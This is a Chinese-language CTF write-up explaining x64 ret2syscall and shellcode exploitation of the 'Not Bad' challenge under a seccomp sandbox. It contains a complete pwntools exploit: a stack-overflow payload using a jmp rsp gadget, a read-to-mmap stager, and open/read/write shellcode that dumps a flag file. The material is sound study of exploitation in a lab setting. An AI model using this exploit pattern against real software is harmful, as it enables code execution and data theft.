linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
文章目录
- What is ret2syscall
- pwn题思路
- 例题
-
- 保护机制
- 写payload
-
- 打开flag
- 读取flag
- 写到输出中
- 生成shellcode
- 开始做题
-
- 调用read(0,mem,0x1000)把我们真正的shellcode写道mem
- 调试是否可以往mem写shellcode
- 往mem填写读取flag的shellcode
- 总结
What is ret2syscall
ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到syscall,可以考虑利用这种攻击手法
而且现在有些题目出现沙盒,seccomp机制会ban掉一些函数,然后一般会允许使用open,read,write,就可以用读文件方法获取flag
pwn题思路
一般如果看到沙盒或者出现syscall可以考虑使用这种攻击手法
例题
[极客大挑战 2019]Not Bad
保护机制
看上去没有任何保护,栈可写可执行
![linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad_第1张图片](http://img.e-com-net.com/image/info8/6c8ed14beb40461faead9c8de6eb8dd4.jpg)
进入之后发现有这么一个函数
![linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad_第2张图片](http://img.e-com-net.com/image/info8/fa9fda2110284b0ca0961a8e50d29768.jpg)
这个时候查看一下可以使用哪些syscall
够用了
写payload
首先介绍一下 需要用到的syscall格式
![linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad_第3张图片](http://img.e-com-net.com/image/info8/63bf10b38e2e42bb92a68e23a2656576.jpg)
那么我们开始写
打开flag
xor rsi ,rsi #这里0代表只读,选择异或是防止出现0字符,有些时候有影响
xor rdx,rdx #这里是读文件,就不需要设置mode,写成0就好
mov rax,0x67616c662f2e;#pwntools的汇编好像不能push太大的,虽然在x64位里面这个是可以放下的 ./flag
push rax;
mov rdi,rsp; #设置为我们字符串的位置
mov rax,2; #代表open
syscall;
读取flag
由于上一步会返回rax代表fd
mov rdi,rax
mov rsi,rsp #设置保存的位置
mov rdx,0x30
mov rax,0 #read到我们的栈上
syscall
写到输出中
mov rdi,1 #1代表标准输出
mov rsi,rsp
mov rdx,0x30
mov rax,1#写到我们的标准输出来
syscall
在pwntools中,把这些汇编指令编译成机器码很简单,每条指令用;分割
生成shellcode
open_flag = """
xor rsi ,rsi ;
xor rdx,rdx;
mov rax,0x67616c662f2e;
push rax;
mov rdi,rsp;
mov rax,2;
syscall;
"""
read_flag = """
mov rdi,rax;
mov rsi,rsp ;
mov rdx,0x30;
mov rax,0;
syscall;
"""
output_flag = """
mov rdi,1 ;
mov rsi,rsp;
mov rdx,0x30;
mov rax,1;
syscall;
"""
shellcode = asm(open_flag + read_flag + output_flag)
这个时候由于可能shellcode太长,需要把shellcode写到mmap分配的地方
开始做题
调用read(0,mem,0x1000)把我们真正的shellcode写道mem
mov rdi,0; #标准输入
mov rsi,0x123000;#地址
mov rdx,0x1000;#大小
mov rax,0;#0号也就是read调用
syscall;
mov rax,0x123000;#当执行完read后去执行mem里面执行shellcode
jmp rax;
调试是否可以往mem写shellcode
read_on_mem = """
mov rdi,0;
mov rsi,0x123000;
mov rdx,0x1000;
mov rax,0;
syscall;
mov rax,0x123000;
jmp rax;
"""
jmp_rsp = 0x400A01
payload = (
asm(read_on_mem).ljust(0x28, b"\0") + p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp;")
)
print(len(payload))
debug()
sla(b"have fun!", payload)
it()
![linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad_第4张图片](http://img.e-com-net.com/image/info8/388cf1acafeb4785b9aab0fdbbbc7061.jpg)
可以看到红色的是返回地址,我们覆盖成了jmp rsp
由于当我们ret之后,会把返回地址pop出来,这个时候rsp,指向我们的shellcode,然后jmp rsp,就会把程序劫持到我们的栈上负责跳转的部分
![linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad_第5张图片](http://img.e-com-net.com/image/info8/00e7cc063ae748d09a133df9a8c0d73a.jpg)
sub rsp是调整栈指针,让我们可以回到之前真正要执行的部分
![linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad_第6张图片](http://img.e-com-net.com/image/info8/9ebc7c2a29fe4693841b2016224e4dc9.jpg)
等待输入
![linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad_第7张图片](http://img.e-com-net.com/image/info8/70820be385a242179cf29e77361e1883.jpg)
往mem填写读取flag的shellcode
read_on_mem = """
mov rdi,0;
mov rsi,0x123000;
mov rdx,0x1000;
mov rax,0;
syscall;
mov rax,0x123000;
jmp rax;
"""
jmp_rsp = 0x400A01
payload = (
asm(read_on_mem).ljust(0x28, b"\0") + p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp;")
)
sla(b"have fun!", payload)
open_flag = """
xor rsi ,rsi ;
xor rdx,rdx;
mov rax,0x67616c662f2e;
push rax;
mov rdi,rsp;
mov rax,2;
syscall;
"""
read_flag = """
mov rdi,rax;
mov rsi,rsp ;
mov rdx,0x30;
mov rax,0;
syscall;
"""
output_flag = """
mov rdi,1 ;
mov rsi,rsp;
mov rdx,0x30;
mov rax,1;
syscall;
"""
sla(b"Baddd!\n", asm(open_flag + read_flag + output_flag))
it()
可以直接打远程了
总结
这个里面最大的难点其实不是写shellcode,而是利用jmp rsp达到指令回到栈上的效果